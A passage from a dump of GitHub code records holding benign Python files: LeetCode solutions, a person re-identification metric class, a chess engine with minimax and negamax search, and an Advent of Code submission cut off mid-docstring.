python_requires='>=3.7',\n)\n","repo_name":"geoscan/pioneer_sdk","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"14477236268","text":"#Memoization\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n \n def dp(l1,l2):\n if l1>l2:\n return 0\n if l1 == l2:\n return 1\n if dp1[l1][l2] != -1:\n return dp1[l1][l2]\n \n if s[l1] == s[l2]:\n dp1[l1][l2] = dp(l1+1,l2-1) + 2\n else:\n dp1[l1][l2] = max(dp(l1+1,l2),dp(l1,l2-1))\n \n return dp1[l1][l2]\n \n l = len(s)\n dp1 = [[-1 for i in range(l+1)]for j in range(l+1)]\n return dp(0,l-1)\n\n#Tabular\nclass Solution:\n def longestPalindromeSubseq(self, s: str) -> int:\n \n l = len(s)\n s2 = s[::-1]\n dp = [[0 for i in range(l+1)]for j in range(l+1)]\n \n \n for i in range(1,l+1):\n for j in range(1,l+1):\n if s[i-1] == s2[j-1]:\n dp[i][j] = dp[i-1][j-1] + 1\n else:\n dp[i][j] = max(dp[i-1][j],dp[i][j-1])\n \n return dp[l][l]\n \n","repo_name":"bhardwaj-ishita/Interview-Prep","sub_path":"DSA/Dynamic-Programming/LongestPalindromicSubseq.py","file_name":"LongestPalindromicSubseq.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"73699435927","text":"class Solution:\n def sortColors(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n\n cnts = [0, 0, 0] # red, white, bule\n\n for num in nums:\n if num == 0:\n cnts[0] += 1\n elif num == 1:\n cnts[1] += 1\n else:\n cnts[2] += 1\n\n # write 0\n offset = 0\n for i in range(cnts[0]):\n nums[i] = 0\n\n # write 1\n offset = cnts[0]\n for i in range(cnts[1]):\n nums[i + offset] = 1\n\n # write 2\n offset += cnts[1]\n for i in range(cnts[2]):\n nums[i + offset] = 2\n\n return\n\n\"\"\"\nResults:\nRuntime: 16 ms, faster than 99.99% of Python3 online submissions for Sort Colors.\nMemory Usage: 14.3 MB, less than 5.09% of Python3 online submissions for Sort Colors.\n\"\"\"","repo_name":"buptwxd2/leetcode","sub_path":"Round_1/75. Sort Colors/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71704758487","text":"from dataclasses import dataclass\nfrom logging import warning\n\nimport numpy as np\nimport torch\nfrom torchmetrics import Metric\nfrom tqdm import tqdm\n\nfrom person_reid.metrics.utils import (get_device_dtype, empty_metric_value,\n plot_cmc_line_plot)\n\n__all__ = ['ConfusionMetrics']\n\n\n@dataclass\nclass MetricAccumulator:\n tp: int = 0\n fp: int = 0\n tp_overall: int = 0\n fp_overall: int = 0\n\n def accumulate(self):\n self.tp_overall += self.tp\n self.fp_overall += self.fp\n self.tp = 0\n self.fp = 0\n\n @property\n def accuracy(self):\n assert self.tp == 0 and self.fp == 0\n if self.tp_overall + self.fp_overall == 0:\n warning('Not enough data to calculate accuracy')\n return 0.0\n return self.tp_overall / (self.tp_overall + self.fp_overall)\n\n\nclass ConfusionMetrics(Metric):\n def __init__(self, ranks=(1, 5, 10), max_cmc_rank=100):\n super().__init__(compute_on_step=False)\n self._ranks = ranks\n self._max_cmc_rank = max_cmc_rank\n self.add_state(f'gallery_embeddings', [], dist_reduce_fx=\"cat\")\n self.add_state(f'gallery_labels', [], dist_reduce_fx=\"cat\")\n self.add_state(f'query_embeddings', [], dist_reduce_fx=\"cat\")\n self.add_state(f'query_labels', [], dist_reduce_fx=\"cat\")\n self.eps = 1e-6\n\n def update(self, embeddings, gt_labels, is_query):\n self.query_embeddings.append(embeddings[is_query].half())\n self.query_labels.append(gt_labels[is_query])\n self.gallery_embeddings.append(embeddings[~is_query].half())\n self.gallery_labels.append(gt_labels[~is_query])\n\n def _calc_metrics_by_rank(self, class_idx, distances, metrics):\n def _calc_map():\n cmc = np.array([acc.tp for rank, acc in sorted(metrics.items(), key=lambda x: x[0])],\n dtype=np.float32)\n if cmc.sum() == 0:\n return 0.0\n\n cum_cmc = np.asarray([x / (i + 1.) for i, x in enumerate(cmc.cumsum())])\n return cum_cmc.sum() / cmc.sum()\n\n top_indexes = torch.argsort(distances)[:self._max_cmc_rank]\n top_classes = self.gallery_labels[top_indexes]\n for rank in range(self._max_cmc_rank):\n top_classes_ranked = top_classes[:rank]\n if (top_classes_ranked == class_idx).any():\n metrics[rank].tp += 1\n else:\n metrics[rank].fp += 1\n\n ap = _calc_map()\n\n for rank in range(self._max_cmc_rank):\n metrics[rank].accumulate()\n\n return ap\n\n def compute(self):\n device, dtype = get_device_dtype(self.gallery_embeddings)\n categories = set(list(self.query_labels))\n if len(categories) == 0:\n warning(f'ConfusionMetrics has received 0 categories in query data, check your test data')\n return empty_metric_value(dtype, device)\n\n min_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n max_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n mean_metrics_by_rank = {rank: MetricAccumulator() for rank in range(self._max_cmc_rank)}\n min_aps, max_aps, mean_aps = [], [], []\n for class_idx in tqdm(categories, desc='Calculating confusion metrics', leave=False):\n query_embeddings = self.query_embeddings[self.query_labels == class_idx]\n dists = torch.cdist(query_embeddings, self.gallery_embeddings,\n compute_mode='use_mm_for_euclid_dist')\n min_ap = self._calc_metrics_by_rank(class_idx, dists.min(dim=0)[0], min_metrics_by_rank)\n max_ap = self._calc_metrics_by_rank(class_idx, dists.max(dim=0)[0], max_metrics_by_rank)\n mean_ap = self._calc_metrics_by_rank(class_idx, dists.mean(dim=0), mean_metrics_by_rank)\n min_aps.append(min_ap)\n max_aps.append(max_ap)\n mean_aps.append(mean_ap)\n\n output = {}\n for rank in self._ranks:\n output[f'accuracy_{rank}_min'] = torch.tensor(min_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'accuracy_{rank}_max'] = torch.tensor(max_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'accuracy_{rank}_mean'] = torch.tensor(mean_metrics_by_rank[rank].accuracy,\n dtype=dtype, device=device)\n output[f'mAP_min'] = torch.tensor(np.mean(min_aps), dtype=dtype, device=device)\n output[f'mAP_max'] = torch.tensor(np.mean(max_aps), dtype=dtype, device=device)\n output[f'mAP_mean'] = torch.tensor(np.mean(mean_aps), dtype=dtype, device=device)\n output[f'cmc_min'] = plot_cmc_line_plot(min_metrics_by_rank)\n output[f'cmc_max'] = plot_cmc_line_plot(max_metrics_by_rank)\n output[f'cmc_mean'] = plot_cmc_line_plot(mean_metrics_by_rank)\n\n return output\n\n def reset(self):\n self.query_embeddings.clear()\n self.query_labels.clear()\n self.gallery_embeddings.clear()\n self.gallery_labels.clear()\n","repo_name":"JegernOUTT/reid_template","sub_path":"person_reid/metrics/confusion_metrics.py","file_name":"confusion_metrics.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"5759293448","text":"from const import *\nfrom tile import Tile\nfrom piece import *\nfrom move import Move\nimport copy\nimport random\n\nclass Board:\n\n def __init__(self):\n self.tiles = [[0,0,0,0,0,0,0,0] for col in range(COLS)] #Initializing Tiles\n self.last_move = None\n self._create()\n self._add_pieces('black')\n self._add_pieces('white')\n self.move_log = []\n\n def _create(self):\n \"\"\"\n Create the board\n \"\"\"\n #Creating all tiles\n for row in range(ROWS):\n for col in range(COLS):\n self.tiles[row][col] = Tile(row, col)\n\n def _add_pieces(self, color):\n \"\"\"\n Add pieces for the initial board setup\n \"\"\"\n row_pawn, row_figure = (1, 0) if color == 'black' else (6, 7)\n\n #Adding pawns\n for col in range(COLS):\n self.tiles[row_pawn][col] = Tile(row_pawn, col, Pawn(color))\n \n #Adding knights\n self.tiles[row_figure][1] = Tile(row_figure, 1, Knight(color))\n self.tiles[row_figure][6] = Tile(row_figure, 6, Knight(color))\n\n #Adding bishops\n self.tiles[row_figure][2] = Tile(row_figure, 2, Bishop(color))\n self.tiles[row_figure][5] = Tile(row_figure, 5, Bishop(color))\n\n #Adding rooks\n self.tiles[row_figure][0] = Tile(row_figure, 0, Rook(color))\n self.tiles[row_figure][7] = Tile(row_figure, 7, Rook(color))\n\n #Adding the queen\n self.tiles[row_figure][3] = Tile(row_figure, 3, Queen(color))\n\n #Adding the king\n self.tiles[row_figure][4] = Tile(row_figure, 4, King(color))\n \n def possible_moves(self, piece, row, col, checked=False):\n \"\"\"\n Determine all valid moves of the piece\n \"\"\"\n def pawn_moves():\n \"\"\"\n All possible moves for the pawn pieces\n \"\"\"\n if piece.moved:\n steps = 1\n else:\n steps = 2\n \n ##Vertical moves\n start = row + piece.direction #Current position with pawn direction\n end = row + (piece.direction * (1 + steps)) #Maximum position (2 forward if it hasn't move yet else 1)\n for move_row in range(start, end, piece.direction):\n if Tile.in_range(move_row): #Check if the move is inside the board\n if self.tiles[move_row][col].is_empty(): #Check if the tile is empty\n initial_tile = Tile(row, col)\n final_tile = Tile(move_row, col)\n move = Move(initial_tile, final_tile, piece) #Create the new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n else:\n #Pawn is blocked\n break #prevent the pawn to move 2 tiles forward even if an other piece is in front of it\n else:\n break\n \n ##Diagonal moves\n move_row = row + piece.direction\n move_cols = [\n col - 1,\n col + 1\n ]\n \n for move_col in move_cols:\n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].has_hostile_piece(piece.color): #Check if the tile contains an enemy\n initial_tile = Tile(row, col)\n final_piece = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, final_piece)\n move = Move(initial_tile, final_tile, piece, self.tiles[move_row][move_col].piece) #Create the new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n \n ##En passant moves\n if piece.color == 'white':\n initial_pawn_row = 3\n final_pawn_row = 2\n else:\n initial_pawn_row = 4\n final_pawn_row = 5\n \n #Left en passant\n if Tile.in_range(col - 1) and row == initial_pawn_row: #Check if the left tile of the pawn is inside the board and if the pawn is in the fourth row\n if self.tiles[row][col - 1].has_hostile_piece(piece.color): #Check if the pawn has an oponent piece at his left\n enemy = self.tiles[row][col - 1].piece #Get the enemy piece\n if isinstance(enemy, Pawn): #Check if the enemy is a pawn\n if enemy.en_passant: #Check if the enemy just moved 2 tiles\n initial_tile = Tile(row, col) #Get initial tile\n final_tile = Tile(final_pawn_row, col - 1, enemy) #Get final tile\n move = Move(initial_tile, final_tile, piece, enemy) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add the pawn move to its list\n else:\n piece.add_move(move) #Add the pawn move to its list\n \n #Right en passant\n if Tile.in_range(col + 1) and row == initial_pawn_row: #Check if the left tile of the pawn is inside the board and if the pawn is in the fourth row\n if self.tiles[row][col + 1].has_hostile_piece(piece.color): #Check if the pawn has an oponent piece at his left\n enemy = self.tiles[row][col + 1].piece #Get the enemy piece\n if isinstance(enemy, Pawn): #Check if the enemy is a pawn\n if enemy.en_passant: #Check if the enemy just moved 2 tiles\n initial_tile = Tile(row, col) #Get initial tile\n final_tile = Tile(final_pawn_row, col + 1, enemy) #Get final tile\n move = Move(initial_tile, final_tile, piece, enemy) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add the pawn move to its list\n else:\n piece.add_move(move) #Add the pawn move to its list\n \n def knight_moves():\n \"\"\"\n All possible moves for the knight pieces\n \"\"\"\n moves = [\n (row + 1, col + 2),\n (row + 2, col + 1),\n (row + 2, col - 1),\n (row + 1, col - 2),\n (row - 1, col - 2),\n (row - 2, col - 1),\n (row - 2, col + 1),\n (row - 1, col + 2),\n ]\n \n #for each potential move, check if it's inside the board and if a move is possible (empty tile or with an enemy within it)\n for move in moves:\n move_row, move_col = move\n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].is_empty_or_hostile(piece.color): #Check if the tile is empty or contains an enemy piece\n initial_tile = Tile(row, col)\n final_piece = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, final_piece)\n move = Move(initial_tile, final_tile, piece, final_piece) #Create the new possible move\n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n break #If moving the knight lead to a check situation, it will be the case for all its possible moves, so we break here\n else:\n piece.add_move(move) #Add it to the list \n \n def line_moves(increments):\n \"\"\"\n All possible straight line moves that we'll use for the bishop, the rook and the queen\n \"\"\"\n for increment in increments:\n row_inc, col_inc = increment\n move_row = row + row_inc\n move_col = col + col_inc\n \n while True:\n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n initial_tile = Tile(row, col)\n enemy = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col, piece)\n move = Move(initial_tile, final_tile, piece, enemy) #Create new possible move\n \n if self.tiles[move_row][move_col].is_empty():\n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list\n \n elif self.tiles[move_row][move_col].has_hostile_piece(piece.color):\n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n piece.add_move(move) #Add it to the list \n break #Prevent to continue looping after reaching an enemy\n \n elif self.tiles[move_row][move_col].has_friendly_piece(piece.color):\n break #Prevent to continue looping behind an ally\n \n else:\n break\n \n move_row = move_row + row_inc\n move_col = move_col + col_inc\n \n def king_moves():\n \"\"\"\n All king pieces possibe moves\n \"\"\"\n adjacent_moves = [\n (row - 1, col), #Up move\n (row - 1, col + 1), #Up right move\n (row, col + 1), #Right move\n (row + 1, col + 1), #Down right move\n (row + 1, col), #Down move\n (row + 1, col - 1), #Down left move\n (row, col - 1), #Left move\n (row - 1, col - 1), #Up left move\n ]\n \n for adjacent_move in adjacent_moves:\n move_row, move_col = adjacent_move\n \n if Tile.in_range(move_row, move_col): #Check if the move is inside the board\n if self.tiles[move_row][move_col].is_empty_or_hostile(piece.color): #Check if the tile is empty or contains an enemy piece\n initial_tile = Tile(row, col)\n enemy = self.tiles[move_row][move_col].piece\n final_tile = Tile(move_row, move_col)\n move = Move(initial_tile, final_tile, piece, enemy) #Create de new possible move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, move): #Check if the move does not lead to a check situation\n piece.add_move(move) #Add it to the list\n else:\n break\n else:\n piece.add_move(move) #Add it to the list \n \n if not piece.moved: #Checking if the king has not move yet\n ##Queen Castling\n left_rook = self.tiles[row][0].piece #Get the piece on the far left of the king\n if isinstance(left_rook, Rook): #Check if this piece is a rook\n if not left_rook.moved: #Check if the rook has not move yet\n for column in range(1,4): #Loop the tiles between the rook and the king\n if self.tiles[row][column].has_piece(): #Check if there is a piece on the tile\n break #break because there is an obstacle between the rook and the king\n \n elif column == 3:\n piece.left_rook = left_rook #Add a reference to the rook\n \n ###Rook move\n initial_tile = Tile(row, 0) #Set the rook initial tile\n final_tile = Tile(row, 3) #Set the rook destination tile\n rook_move = Move(initial_tile, final_tile, left_rook) #Create the new move\n \n ###King move\n initial_tile = Tile(row, col) #Set the king initial tile\n final_tile = Tile(row, 2) #Set the king destination tile\n king_move = Move(initial_tile, final_tile, piece) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, king_move) and not self.in_check(left_rook, rook_move): #Check if the moves does not lead to a check situation\n piece.add_move(king_move) #Add the king move to its list\n left_rook.add_move(rook_move) #Add the rook move to its list\n else:\n piece.add_move(king_move) #Add it to the list\n left_rook.add_move(rook_move) #Add the rook move to its list \n \n ##King castling\n right_rook = self.tiles[row][7].piece #Get the piece on the far right of the king\n if isinstance(right_rook, Rook): #Check if this piece is a rook\n if not right_rook.moved: #Check if the rook has not move yet\n for column in range(5,7): #Loop the tiles between the rook and the king\n if self.tiles[row][column].has_piece(): #Check if there is a piece on the tile\n break #break because there is an obstacle between the rook and the king\n \n elif column == 6:\n piece.right_rook = right_rook #Add a reference to the rook\n \n ###Rook move\n initial_tile = Tile(row, 7) #Set the rook initial tile\n final_tile = Tile(row, 5) #Set the rook destination tile\n rook_move = Move(initial_tile, final_tile, right_rook) #Create the new move\n \n ###King move\n initial_tile = Tile(row, col) #Set the king initial tile\n final_tile = Tile(row, 6) #Set the king destination tile\n king_move = Move(initial_tile, final_tile, piece) #Create the new move\n \n if not checked: #Check if the move has already been checked\n if not self.in_check(piece, king_move) and not self.in_check(right_rook, rook_move): #Check if the moves does not lead to a check situation\n piece.add_move(king_move) #Add the king move to its list\n right_rook.add_move(rook_move) #Add the rook move to its list\n else:\n piece.add_move(king_move) #Add it to the list\n right_rook.add_move(rook_move) #Add the rook move to its list\n \n piece.moves = []\n \n if isinstance(piece, Pawn):\n pawn_moves()\n \n elif isinstance(piece, Knight):\n knight_moves()\n \n elif isinstance(piece, Bishop):\n line_moves([\n (1, 1), #down right direction\n (1, -1), #down left direction\n (-1, 1), #up right direction\n (-1, -1) #up left direction\n ])\n \n elif isinstance(piece, Rook):\n line_moves([\n (1, 0), #down direction\n (0, 1), #right direction\n (-1, 0), #up direction\n (0, -1) #left direction\n ])\n \n elif isinstance(piece, Queen):\n line_moves([\n (1, 1), #down right direction\n (1, -1), #down left direction\n (-1, 1), #up right direction\n (-1, -1), #up left direction\n (1, 0), #down direction\n (0, 1), #right direction\n (-1, 0), #up direction\n (0, -1) #left direction\n ])\n \n elif isinstance(piece, King):\n king_moves()\n \n def move(self, piece, move, testing=False):\n \"\"\"\n Moving a piece on the board\n \"\"\"\n initial_tile = move.initial_tile\n final_tile = move.final_tile\n \n empty_en_passant = self.tiles[final_tile.col][final_tile.row].is_empty()\n \n self.tiles[initial_tile.col][initial_tile.row].piece = None #Clear the initial tile\n destination_tile = self.tiles[final_tile.col][final_tile.row]\n destination_tile.piece = piece #Set the piece on his destination tile\n self.move_log.append(move)\n \n if isinstance(piece, Pawn): #Check if the piece is a pawn\n ##Pawn promotion\n self.pawn_promotion(piece, move) #Promote the pawn to Queen\n \n ##Pawn en passant\n difference = final_tile.row - initial_tile.row\n if difference != 0 and empty_en_passant: #Check if the pawn captured an enemy pawn (diagonal move) and if the tile is empty\n destination_tile = self.tiles[initial_tile.col][initial_tile.row + difference].piece\n move.captured_piece = destination_tile\n self.tiles[initial_tile.col][initial_tile.row + difference].piece = None #Clear the initial tile\n self.tiles[final_tile.col][final_tile.row].piece = piece #Set the piece on his destination tile\n piece.did_en_passant = True\n piece.did_en_passant_move = move\n \n ##King and Queen castling\n if isinstance(piece, King): #Check if the piece is the king\n if self.castling(initial_tile, final_tile) and not testing: #Check if we are castling\n difference = final_tile.row - initial_tile.row #Check which castling is done (king or queen castling)\n if difference < 0:\n rook = piece.left_rook\n else:\n rook = piece.right_rook\n rook_move = rook.moves[-1]\n self.move(rook, rook_move) #Move the rook with its last possible move (that we just added to the list on the king_moves() function)\n self.move_log.append(move)\n \n piece.moved = True #Set the piece in the \"already moved\" state\n piece.castled = True\n piece.castling_move = move\n piece.clear_moves() #Clear the list of possible moves as the piece position has changed\n self.last_move = move #Saving the move as the last piece move\n \n def undo_move(self):\n if len(self.move_log) != 0: #Check if there is a last move\n move = self.move_log.pop() #Get the last move and delete it from the list\n moved_piece = move.moved_piece\n captured_piece = move.captured_piece\n #Reverse the move\n self.tiles[move.initial_tile.col][move.initial_tile.row].piece = moved_piece\n moved_piece.moved = False\n if isinstance(moved_piece, Queen): #Check if the piece is a Queen\n if moved_piece.promoted: #Check if the Queen is a promoted Pawn\n if move == moved_piece.promotion_move:\n self.tiles[move.initial_tile.col][move.initial_tile.row].piece = Pawn(moved_piece.color) #Cancel the pawn promotion\n \n self.tiles[move.final_tile.col][move.final_tile.row].piece = captured_piece\n \n if isinstance(moved_piece, King): #Check if the piece is a Rook\n if moved_piece.castled: #Check if the rook was castled\n if move == moved_piece.castling_move:\n self.undo_move()\n moved_piece.castled = False\n moved_piece.castling_move = []\n elif isinstance(moved_piece, Pawn):\n if moved_piece.did_en_passant:\n if moved_piece.did_en_passant_move == move:\n difference = move.initial_tile.row - move.final_tile.row\n # self.tiles[move.final_tile.col][move.initial_tile.row - difference].piece = captured_piece\n moved_piece.did_en_passant = False\n moved_piece.did_en_passant_move = []\n \n def valid_move(self, piece, move):\n \"\"\"\n return all possible moves of the piece in the current position\n \"\"\"\n return move in piece.moves\n \n def get_all_valid_moves(self, game):\n valid_moves = []\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece != None and piece.color == game.next_player:\n self.possible_moves(piece, row, col)\n if piece.moves != None:\n for move in piece.moves:\n valid_moves.append(move)\n return valid_moves\n \n def pawn_promotion(self, piece, move):\n \"\"\"\n Promote pawn that reached his opponent backline\n \"\"\"\n if move.final_tile.col == 0 or move.final_tile.col == 7: #Check if the pawn is on either one of the backlines\n self.tiles[move.final_tile.col][move.final_tile.row].piece = Queen(piece.color) #Replace the pawn by a new Queen\n piece = self.tiles[move.final_tile.col][move.final_tile.row].piece\n piece.promoted = True\n piece.promotion_move = move\n \n def castling(self, initial_tile, final_tile):\n \"\"\"\n Check if the king is castling\n \"\"\"\n return abs(initial_tile.row - final_tile.row) == 2\n \n def in_check(self, piece, move):\n \"\"\"\n Check if there is a check situation\n \"\"\"\n temp_board = copy.deepcopy(self) #Create a temporary copy of the board\n temp_piece = copy.deepcopy(piece) #Create a temporary copy of the piece\n temp_board.move(temp_piece, move, testing=True) #Move the piece\n \n for row in range(ROWS):\n for col in range(COLS):\n if temp_board.tiles[row][col].has_hostile_piece(piece.color): #Check if there is an enemy piece\n enemy = temp_board.tiles[row][col].piece #Get the enemy piece\n temp_board.possible_moves(enemy, row, col, checked=True) #Get all possible moves of the enemy piece\n for possible_move in enemy.moves: #Loop for each possible moves\n if isinstance(possible_move.final_tile.piece, King): #Check if there is the oponent king on the final tile\n return True #Return that there is a check situation\n return False #Return that there is no check situation\n \n def set_en_passant(self, piece):\n \"\"\"\n Enable the en passant attribut\n \"\"\"\n if not isinstance(piece, Pawn): #Check if the piece is not a Pawn\n return\n \n for row in range(ROWS):\n for col in range(COLS):\n if isinstance(self.tiles[row][col].piece, Pawn):\n self.tiles[row][col].piece.en_passant = False\n \n piece.en_passant = True\n \n def ai_random_move(self, valid_moves):\n \"\"\"\n Return a random move among all possible moves of the current state of the game\n \"\"\"\n return valid_moves[random.randint(0, len(valid_moves) - 1)] \n \n def ai_best_minimax_move(self, depth, game, is_maximizing):\n \"\"\"\n Returns the optimal move in the current game state\n This function is also the first iteration of the minimax algorithm (calls the recursive \"minimax\" function)\n Replaced by \"ai_best_negamax_move\" function\n \"\"\"\n print(\"The AI is thinking...\")\n board = copy.deepcopy(self)\n valid_moves = board.get_all_valid_moves(game)\n optimal_move = None\n \n if valid_moves == None:\n return None\n elif is_maximizing:\n max_value = -CHECKMATE\n \n for move in valid_moves:\n piece = copy.deepcopy(self.tiles[move.initial_tile.col][move.initial_tile.row].piece)\n if piece != None:\n board.move(piece, move)\n value = board.minimax(depth - 1, game, -CHECKMATE, CHECKMATE, not is_maximizing)\n if value > max_value:\n max_value = value\n optimal_move = move\n return optimal_move\n else:\n min_value = CHECKMATE\n for move in valid_moves:\n piece = copy.deepcopy(self.tiles[move.initial_tile.col][move.initial_tile.row].piece)\n if piece != None:\n board.move(piece, move)\n value = board.minimax(depth - 1, game, -CHECKMATE, CHECKMATE, not is_maximizing)\n if value < min_value:\n min_value = value\n optimal_move = move\n return optimal_move\n \n def minimax(self, depth, game, alpha, beta, is_maximizing):\n \"\"\"\n Recursive function that returns the optimal move in the current situation\n Replaced by \"negamax\" function\n \"\"\"\n if depth == 0:\n return self.evaluate_board()\n \n valid_moves = self.get_all_valid_moves(game)\n if is_maximizing:\n if valid_moves == None:\n return -CHECKMATE\n max_value = -CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n value = max(max_value, self.minimax(depth - 1, game, alpha, beta, False))\n if value > max_value:\n max_value = value\n \n if max_value > alpha: #Pruning\n alpha = max_value\n if alpha >= beta:\n break\n return max_value\n else:\n if valid_moves == None:\n return CHECKMATE\n min_value = CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n value = min(min_value, self.minimax(depth - 1, game, alpha, beta, True))\n if value < min_value:\n min_value = value\n \n if min_value < beta: #Pruning\n beta = min_value\n if beta >= alpha:\n break\n return min_value\n\n def ai_best_negamax_move(self, game):\n \"\"\"\n Returns the optimal move in the current game state\n This function is also the first iteration of the negamax algorithm (calls the recursive \"negamax\" function)\n \"\"\"\n print(\"The AI is thinking...\")\n global optimal_move\n global count\n count = 0\n board = copy.deepcopy(self)\n valid_moves = board.get_all_valid_moves(game)\n optimal_move = None\n board.negamax(valid_moves, DEPTH, game, -CHECKMATE, CHECKMATE, 1 if game.next_player == 'white' else -1)\n print(\"iteration = \" + str(count))\n return optimal_move\n\n def negamax(self, valid_moves, depth, game, alpha, beta, turn_multiplier):\n \"\"\"\n Recursive function that combines the two parts of the minimax algorithm (combines the maximizing and the minimizing parts in one)\n \"\"\"\n global optimal_move\n global count\n count += 1\n if depth == 0:\n return self.evaluate_board() * turn_multiplier\n \n max_value = -CHECKMATE\n for move in valid_moves:\n piece = self.tiles[move.initial_tile.col][move.initial_tile.row].piece\n if piece != None:\n self.move(piece, move)\n valid_moves = self.get_all_valid_moves(game)\n value = -self.negamax(valid_moves, depth - 1, game, -beta, -alpha, -turn_multiplier)\n\n if value > max_value:\n max_value = value\n if depth == DEPTH:\n optimal_move = move\n self.undo_move()\n if max_value > alpha: #Pruning\n alpha = max_value\n\n if alpha >= beta:\n break\n return max_value\n \n def evaluate_board(self):\n \"\"\"\n Evaluate the board state : returns a positive value if white is in advance and a negative one if black is\n The score depend on the positions of the pieces and the material advantage\n \"\"\"\n # A piece with more move choices will be prefered as others:\n # | wR wN wB wQ wK wB wN wR |\n # | wP wP wP wP wP wP wP wP |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ __ __ __ |\n # | __ __ __ __ __ P1 __ P2 | P1 is prefered because he has more possible moves for next turns\n # | bP bP bP bP bP bP bP bP |\n # | bR bN bB bQ bK bB __ bR |\n\n score = 0\n for row in range(ROWS):\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece != None:\n color = piece.color\n position_score = 0\n #To improve the AI, we will weight the score based on the position of the pieces\n if isinstance(piece, Knight):\n position_score = piece_position_score[\"N\"][row][col]\n elif isinstance(piece, Bishop):\n position_score = piece_position_score[\"B\"][row][col]\n elif isinstance(piece, Queen):\n position_score = piece_position_score[\"Q\"][row][col]\n elif isinstance(piece, Rook):\n position_score = piece_position_score[\"R\"][row][col]\n elif isinstance(piece, Pawn):\n position_score = piece_position_score[\"wP\"][row][col] if color == 'white' else piece_position_score[\"bP\"][row][col]\n \n if color == 'white':\n score += piece.value + position_score * .3\n else:\n score -= piece.value + position_score * .3\n return score\n \n def print_board(self):\n \"\"\"\n Print the board in the console (for debug purpose)\n \"\"\"\n for row in range(ROWS):\n pcol = \"| \"\n for col in range(COLS):\n piece = self.tiles[row][col].piece\n if piece == None:\n pcol += \"__ \"\n elif piece.color == 'white':\n if isinstance(piece, Pawn):\n pcol += \"wP \"\n elif isinstance(piece, Bishop):\n pcol += \"wB \"\n elif isinstance(piece, Knight):\n pcol += \"wN \"\n elif isinstance(piece, Rook):\n pcol += \"wR \"\n elif isinstance(piece, Queen):\n pcol += \"wQ \"\n elif isinstance(piece, King):\n pcol += \"wK \"\n else:\n if isinstance(piece, Pawn):\n pcol += \"bP \"\n elif isinstance(piece, Bishop):\n pcol += \"bB \"\n elif isinstance(piece, Knight):\n pcol += \"bN \"\n elif isinstance(piece, Rook):\n pcol += \"bR \"\n elif isinstance(piece, Queen):\n pcol += \"bQ \"\n elif isinstance(piece, King):\n pcol += \"bK \"\n pcol += \"|\"\n print(pcol)\n print(\"\\n\\n\")","repo_name":"Uragoo/AI_CHESS_GAME","sub_path":"src/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":34910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26794367149","text":"from tool.runners.python import SubmissionPy\nimport string\nfrom functools import reduce\n\ntype_to_priority_map = {\n **{c: i+1 for i, c in enumerate(string.ascii_lowercase)},\n **{c: i+27 for i, c in enumerate(string.ascii_uppercase)}\n}\n\ndef priority(group: str) -> int:\n badge_type = (set(group[0]) & set(group[1]) & set(group[2])).pop()\n return type_to_priority_map[badge_type]\n\nclass SilvestreSubmission(SubmissionPy):\n def run(self, s):\n \"\"\"\n :param s: input in string format\n :return: solution flag\n \"\"\"\n lines = s.split(\"\\n\")\n return sum(priority(lines[n:n+3]) for n in range(0, len(lines), 3))\n\n\ndef test_silvestre():\n \"\"\"\n Run 